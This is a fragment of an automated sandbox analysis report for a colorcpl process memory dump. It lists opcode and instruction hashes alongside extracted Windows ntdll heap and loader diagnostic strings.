                                                                                                    • Opcode ID: 4d5e6a94eb59edcbfb4042c17ab89ac6bfdbee509295c2118f6d2743304e19d6
                                                                                                    • Instruction ID: f7e55367e80a3ace4b79093668dd00621a22bebf28c6a9629cdb0b10984bd19e
                                                                                                    • Opcode Fuzzy Hash: 4d5e6a94eb59edcbfb4042c17ab89ac6bfdbee509295c2118f6d2743304e19d6
                                                                                                    • Instruction Fuzzy Hash: 0B414871A11792DFD702CF24C894BAAB7B6EF06364F908769D4024B791CB78A8C1DB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Item:$ Language:$ Name:$SR - $Type:
                                                                                                    • API String ID: 0-3082644519
                                                                                                    • Opcode ID: 5afd4b03b0727628de34a4bdb757a054f0caaf6836ed3bce18b4579b0d125c02
                                                                                                    • Instruction ID: 6d8252f17c61398e03d74b5eea5e52b481e520b407b2a7d3789d69a5875540c0
                                                                                                    • Opcode Fuzzy Hash: 5afd4b03b0727628de34a4bdb757a054f0caaf6836ed3bce18b4579b0d125c02
                                                                                                    • Instruction Fuzzy Hash: 7441B176A01268ABCB20CB65CC48BDAB7BCAF46300F8446D5A449A7250DF35AE84CF51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: %ld leaks detected.$HEAP: $HEAP[%wZ]: $Inspecting leaks at process shutdown ...$No leaks detected.
                                                                                                    • API String ID: 0-1155200129
                                                                                                    • Opcode ID: c5cc0878f3ba7f86d5062062c11e0779c4fe62fc94a69bd4106b44e768c04384
                                                                                                    • Instruction ID: abcf3ee734d314a0444a845c380e63e6643ce65002425522f7265e517128d4ea
                                                                                                    • Opcode Fuzzy Hash: c5cc0878f3ba7f86d5062062c11e0779c4fe62fc94a69bd4106b44e768c04384
                                                                                                    • Instruction Fuzzy Hash: 6C31B375612682DFD6119B64CA84F2273E9EF46F60FC28B26E4014B752DB34ACC1DF04
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                                    • API String ID: 0-1222099010
                                                                                                    • Opcode ID: 63f9551a89437cbed5dc165c25da7546f6d9008f7d35d8fc822709ff9ff1ad36
                                                                                                    • Instruction ID: 8fe82758c541c1a4429dfa9ceea96f0de85839f71db0ed2c84a1c3d5e65bac1f
                                                                                                    • Opcode Fuzzy Hash: 63f9551a89437cbed5dc165c25da7546f6d9008f7d35d8fc822709ff9ff1ad36
                                                                                                    • Instruction Fuzzy Hash: BD3196786057D1DFD312CB24C804B9A7BE9EF02790F804794E4424B792C7B8B8C0CB11
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                                    • API String ID: 0-3061284088
                                                                                                    • Opcode ID: f408124e906f9d35ac75b54439083c53bed2b43346f6c1a54c1f48f842079f89
                                                                                                    • Instruction ID: c20341883408e78bb5e51e89fbe3a22f0c8eeb04b6b5367746cbf5d0a13f7451
                                                                                                    • Opcode Fuzzy Hash: f408124e906f9d35ac75b54439083c53bed2b43346f6c1a54c1f48f842079f89
                                                                                                    • Instruction Fuzzy Hash: ED014C3A4052E1DED33A9714D818F927BE4DB47770FD44329E0024B751CBE8BC80CA24
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $$.mui$.mun$SystemResources\
                                                                                                    • API String ID: 0-3047833772
                                                                                                    • Opcode ID: 2d76ab2d624bc89371c62870fd286828a92a51b8f04bc2660aef1a3df612f693
                                                                                                    • Instruction ID: 97bc484c42d182a629018dcd5df82eaa82b137ac7ab3852d8e4932bbfbc16945
                                                                                                    • Opcode Fuzzy Hash: 2d76ab2d624bc89371c62870fd286828a92a51b8f04bc2660aef1a3df612f693
                                                                                                    • Instruction Fuzzy Hash: C7623A76A003698FCB24CF55CC40BD9B7B9BB0A311F9446EAE40DA7A54D7319E84CF52
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                    • API String ID: 0-3178619729
                                                                                                    • Opcode ID: af2d23da7195befad4445e6878cd34a41339eff434baf8bf685f042a5eefa739
                                                                                                    • Instruction ID: f0b516f21badffb43c5e2b693f866954623213dcafcd426127afeac46ffea5af
                                                                                                    • Opcode Fuzzy Hash: af2d23da7195befad4445e6878cd34a41339eff434baf8bf685f042a5eefa739
                                                                                                    • Instruction Fuzzy Hash: 87E2C174A00255CFDB15CF69C491BADBBF2FF4A304FA482A9D849AB385D730A845CF90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                    • API String ID: 2994545307-2586055223
                                                                                                    • Opcode ID: 0c45c94be7ceca3431ec96d668cdb6ac89f88cb1368c422582ec0270237a52c0
                                                                                                    • Instruction ID: 01ffb20394dcbc1b5487c50cf313ab80ab64cb0843ebb81e068b879d06a8d19e
                                                                                                    • Opcode Fuzzy Hash: 0c45c94be7ceca3431ec96d668cdb6ac89f88cb1368c422582ec0270237a52c0
                                                                                                    • Instruction Fuzzy Hash: D8613176206382AFE311CB24CC54F57B7E9EF81B10F840B29F9959B291C734E881CB62
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: .txt$.txt2$BoG_ *90.0&!! Yy>$stxt371
                                                                                                    • API String ID: 0-1880532218
                                                                                                    • Opcode ID: f42c35c776c17d1761f9273ef398cb49336c28f0390dcfd98733cc70a6a63081
                                                                                                    • Instruction ID: 17d1e6f22a8085fd389791d23c074a608756640556520e2543ff16c35d930efa
                                                                                                    • Opcode Fuzzy Hash: f42c35c776c17d1761f9273ef398cb49336c28f0390dcfd98733cc70a6a63081
                                                                                                    • Instruction Fuzzy Hash: C5212136F01240FBC701CB588C51BAAB3F9AF85704F8A426AE845EB341E738EA01C344
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $May not destroy the process heap at %p$RtlDestroyHeap
                                                                                                    • API String ID: 0-4256168463
                                                                                                    • Opcode ID: 43e2732c3f94691d49cb57cfffad7ebcf8323f77c3ea48b2d85b240b144256b6
                                                                                                    • Instruction ID: 12072fe3a5a040c722691099fad280b0ee6cb9291b281386247f99233513c414
                                                                                                    • Opcode Fuzzy Hash: 43e2732c3f94691d49cb57cfffad7ebcf8323f77c3ea48b2d85b240b144256b6
                                                                                                    • Instruction Fuzzy Hash: A901C036512751DBCB11DF64C810B8673EAFF03750FC04B65E4829B280DB34ED89CA68
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                    • API String ID: 0-3178619729
                                                                                                    • Opcode ID: d20a99c12f7496c425281ebf43afee9a77f818e9e659f1702b9f21640220f1de
                                                                                                    • Instruction ID: b1afa92f9b474ff1f6d9a61a9bdf70959829f9ca497904c9a4b0362a7db6e2ed
                                                                                                    • Opcode Fuzzy Hash: d20a99c12f7496c425281ebf43afee9a77f818e9e659f1702b9f21640220f1de
                                                                                                    • Instruction Fuzzy Hash: B422E270A00696DFDB05CF24C4A4B7ABBF6FF06B04FA48659E4558B381D775E881CB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                                                    • API String ID: 0-1168191160
                                                                                                    • Opcode ID: c3ada28e05765860cc9ee3f6e87bfab3ff161049f60d2e5210bf55daed91fa6c
                                                                                                    • Instruction ID: 387538be35cbe1e06e66af80850defddd6d795cc1baa56cf6cf0ae00ae2e52d5
                                                                                                    • Opcode Fuzzy Hash: c3ada28e05765860cc9ee3f6e87bfab3ff161049f60d2e5210bf55daed91fa6c
                                                                                                    • Instruction Fuzzy Hash: EAF1B4B5A412698BCB20CF15CC90BDDB3B6EF59304F9586EAD609A7240E7319F81CF58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    • 'LDR: %s(), invalid image format of MUI file , xrefs: 1E693AB4
                                                                                                    • {, xrefs: 1E693ABD
                                                                                                    • LdrpLoadResourceFromAlternativeModule, xrefs: 1E693AAF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 'LDR: %s(), invalid image format of MUI file $LdrpLoadResourceFromAlternativeModule${
                                                                                                    • API String ID: 0-1697150599
                                                                                                    • Opcode ID: 2fe65eadcd271fd639b9898e3531f88313144dc128a3fce416d5a08ee5871bc4
                                                                                                    • Instruction ID: 6884af9337c5d37c22bd5b5ca889dc9504818701ad444bc666e80d187df47493
                                                                                                    • Opcode Fuzzy Hash: 2fe65eadcd271fd639b9898e3531f88313144dc128a3fce416d5a08ee5871bc4
                                                                                                    • Instruction Fuzzy Hash: 22E1AA346083828FD314CF15C590B6BB7E2AF85746FA18A2DF88A8B354DB75DD45CB82
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                                    • API String ID: 0-1145731471
                                                                                                    • Opcode ID: 0bca75221293d0390f273995a2f216d362d80fccb95041a1e35fd252520e3fc8
                                                                                                    • Instruction ID: 5520cab278f83d62cc6c5d81d3ea06de7a4f9f92e8936816cfe0ae08791ece1e
                                                                                                    • Opcode Fuzzy Hash: 0bca75221293d0390f273995a2f216d362d80fccb95041a1e35fd252520e3fc8
                                                                                                    • Instruction Fuzzy Hash: 09B1EC75E556458FCB15CF69CA90B9DB7B6EF85320FA54A29E816EB780D334EC40CB00
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                                    • API String ID: 0-2391371766
                                                                                                    • Opcode ID: 01f931c3bfedb244fde47c9f731da309e122917501cbd964745c9234de2b0986
                                                                                                    • Instruction ID: 214258f06ccf7ddb9f62b601e3e7b4b0b7f5a0bec6bfeb518273172871cfd61b
                                                                                                    • Opcode Fuzzy Hash: 01f931c3bfedb244fde47c9f731da309e122917501cbd964745c9234de2b0986
                                                                                                    • Instruction Fuzzy Hash: 6EB1B0B5B45392AFE311DF55C890F5BB7E8FB49710F910A2AFA409B250D7B0E804CB96
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @$@$\Registry\Machine\System\CurrentControlSet\Control\MUI\UILanguages
                                                                                                    • API String ID: 0-1146358195
                                                                                                    • Opcode ID: 48a8cae36c01eacdbb0894482ffe6fae30705b6067e150083a634196391f1192
                                                                                                    • Instruction ID: 7c29d4eadf1b2de5323d6884f560673e3db886cabe59cba2b85111e9cc8cca95
                                                                                                    • Opcode Fuzzy Hash: 48a8cae36c01eacdbb0894482ffe6fae30705b6067e150083a634196391f1192
                                                                                                    • Instruction Fuzzy Hash: A1A15B75A493929BD311CF24C880B5BBBE9BF88B54F810A2DF9D497250D730ED08CB96
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                    • API String ID: 0-3610490719
                                                                                                    • Opcode ID: 8d5ad398edee7007d74aed62e042d8e80c4b1ff4c5c5c4320356a0bcf0a40f86
                                                                                                    • Instruction ID: acf494bd974db6cd9e5b2bd4fdd19ecfdedebe61e4a6a89cbcec54f52e6ac448
                                                                                                    • Opcode Fuzzy Hash: 8d5ad398edee7007d74aed62e042d8e80c4b1ff4c5c5c4320356a0bcf0a40f86
                                                                                                    • Instruction Fuzzy Hash: EA91F175A11782DFD315CB25CC94B6AB7A6BF46710FC40B69F841AB280DB34A880CF96
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                                                    • API String ID: 0-318774311
                                                                                                    • Opcode ID: 9d66194048338131d5455ed9adfe9ccd41992a389884cf0f41a87b68abce79f3
                                                                                                    • Instruction ID: da829c35af46ab7ca619cbe7669c8e867c55aad6ab8be88cdbc1ec8583f5ff83
                                                                                                    • Opcode Fuzzy Hash: 9d66194048338131d5455ed9adfe9ccd41992a389884cf0f41a87b68abce79f3
                                                                                                    • Instruction Fuzzy Hash: 4E819E75649381AFD311CB15C840B5ABBE9FF85B50F800AADF9809B390E774EA44CB66
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 1E70B82A
                                                                                                    • GlobalizationUserSettings, xrefs: 1E70B834
                                                                                                    • TargetNtPath, xrefs: 1E70B82F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                                    • API String ID: 0-505981995
                                                                                                    • Opcode ID: a7e74ea319e97c2e45c8d00518ebccd6e961bcb8c3125c2751de3e4744a3f010
                                                                                                    • Instruction ID: cdc4798d6fa390c757c0dd67871fa4bcec76d950763191e34fbfcb8d01b0f6ee
                                                                                                    • Opcode Fuzzy Hash: a7e74ea319e97c2e45c8d00518ebccd6e961bcb8c3125c2751de3e4744a3f010
                                                                                                    • Instruction Fuzzy Hash: 67617072951269EBEB21DF54CC88BE9B7F8AF05710F4102E9E509A7260C734AF80CF94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                                    • API String ID: 0-2283098728
                                                                                                    • Opcode ID: 524ead3e218c95472d64e936130b79b12e0f7a175058149a59fd1207d07637ff
                                                                                                    • Instruction ID: 68d960370034ee5de571b4a5cd43c3b1200342d100a82de65b9cdba473259741
                                                                                                    • Opcode Fuzzy Hash: 524ead3e218c95472d64e936130b79b12e0f7a175058149a59fd1207d07637ff
                                                                                                    • Instruction Fuzzy Hash: 1551C2717013829FD714DF24CC84A29B7A6BF8A364F9C0F2DE4A597395DB30A844CB95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    • Heap block at %p modified at %p past requested size of %Ix, xrefs: 1E6DDC32
                                                                                                    • HEAP: , xrefs: 1E6DDC1F
                                                                                                    • HEAP[%wZ]: , xrefs: 1E6DDC12
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                                    • API String ID: 0-3815128232
                                                                                                    • Opcode ID: 578ed50fcc613ed8d28a287182ddfdc98a1f267bb1070953893db29abe5b291e
                                                                                                    • Instruction ID: 85914a3a99b4eb5869a75ab7c8ec90a1de4ca9bf9f7c577bc288c7c21da57529
                                                                                                    • Opcode Fuzzy Hash: 578ed50fcc613ed8d28a287182ddfdc98a1f267bb1070953893db29abe5b291e
                                                                                                    • Instruction Fuzzy Hash: CF5139751003518EE364EF2AC89077277E6FF66348FC14B5AE4C28B285D275E84ADB61
                                                                                                    Uniqueness
                                                                                                    • Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    • RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 1E68FB63
                                                                                                    • HEAP: , xrefs: 1E68FB58
                                                                                                    • HEAP[%wZ]: , xrefs: 1E68FB4B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
                                                                                                    • API String ID: 0-1596344177
                                                                                                    • Opcode ID: 8457ed1b0c4621354dc59f16d2c71233b136333431be6b805af0f83c84fe2f42
                                                                                                    • Instruction ID: 59339ccf5dd1e89e72be33456547de58c42d2d5b36efb8325c06b600677da1d5
                                                                                                    • Opcode Fuzzy Hash: 8457ed1b0c4621354dc59f16d2c71233b136333431be6b805af0f83c84fe2f42
                                                                                                    • Instruction Fuzzy Hash: 2651C030A00256DFDB04CF68C480A69BBF6FF49311FA582A9D8599F246E775ED42CF90
                                                                                                    Uniqueness
                                                                                                    • Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    • LdrpAllocateTls, xrefs: 1E6A1B40
                                                                                                    • minkernel\ntdll\ldrtls.c, xrefs: 1E6A1B4A
                                                                                                    • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 1E6A1B39
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                                    • API String ID: 0-4274184382
                                                                                                    • Opcode ID: 0cf966990117cc72adf1e0638964bc2b77387dc971ecdada431b2a9e73cecb52
                                                                                                    • Instruction ID: 691a476d4da830c70785d952560c70aa1af1537a876a720fb3fa8db260ebfac4
                                                                                                    • Opcode Fuzzy Hash: 0cf966990117cc72adf1e0638964bc2b77387dc971ecdada431b2a9e73cecb52
                                                                                                    • Instruction Fuzzy Hash: 4C417DB5E01645EFDB05CFA9C980BADBBF6FF88310F904619E509A7250E734AD00CB94
                                                                                                    Uniqueness
                                                                                                    • Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    • LdrpInitializeTls, xrefs: 1E6A1A47
                                                                                                    • minkernel\ntdll\ldrtls.c, xrefs: 1E6A1A51
                                                                                                    • DLL "%wZ" has TLS information at %p, xrefs: 1E6A1A40
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                                    • API String ID: 0-931879808
                                                                                                    • Opcode ID: a345dd4e1bfb1878e4110688ba37a9ee9addf12ff1dd1e04065d6120627cd5ca
                                                                                                    • Instruction ID: 0cbb2fb9741ab624fbf02aa55b2a15cb88108a8aa678d524cc98c1ddf8d3fc8d
                                                                                                    • Opcode Fuzzy Hash: a345dd4e1bfb1878e4110688ba37a9ee9addf12ff1dd1e04065d6120627cd5ca
                                                                                                    • Instruction Fuzzy Hash: 83313775A20252EBE7008F45CD84FAA73EDAB88354F810729E50AE7190E770BE408795
                                                                                                    Uniqueness
                                                                                                    • Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @$AddD
                                                                                                    • API String ID: 0-2525844869
                                                                                                    • Opcode ID: 22e0187b942cceb2947a0e7517f420faae47d3e7ecb824cc5f66ed2687d70bc1
                                                                                                    • Instruction ID: fe27ee940983d9ff6b53ace27f6cb407099b82526977d90f53e2ba2d2d7c2cd4
                                                                                                    • Opcode Fuzzy Hash: 22e0187b942cceb2947a0e7517f420faae47d3e7ecb824cc5f66ed2687d70bc1
                                                                                                    • Instruction Fuzzy Hash: D3A159B2618344AFE314CB54C885BABB7E9FF84704F904B2EF99587250E770E944CB66
                                                                                                    Uniqueness
                                                                                                    • Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @$TargetPath
                                                                                                    • API String ID: 0-4164548946
                                                                                                    • Opcode ID: c78038939c52dc7741cdba64b2cc17e0bbf6cb6f24760b2f3fd82576d51c1e13
                                                                                                    • Instruction ID: ce5a6255f3dbbc0287df7aa90f300ba50b2cc123c85ab180064dec9b1b45b0bc
                                                                                                    • Opcode Fuzzy Hash: c78038939c52dc7741cdba64b2cc17e0bbf6cb6f24760b2f3fd82576d51c1e13
                                                                                                    • Instruction Fuzzy Hash: 1A81EC71D143969FD710CF18C895A5FBBA9BF8A704F818B2EEA559B250D330EC05CB92
                                                                                                    Uniqueness
                                                                                                    • Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: \REGISTRY\USER\$\Software\Microsoft\Windows
                                                                                                    • API String ID: 0-4122831824
                                                                                                    • Opcode ID: 82e07b0cd37fd4be1e8751ff8744121d4b03eaff4480c062a0548d474ac0ae67
                                                                                                    • Instruction ID: a079fe92037551c71ce282a506aee36f6fb8768fa6f6cf1d8584af80cbd84c46
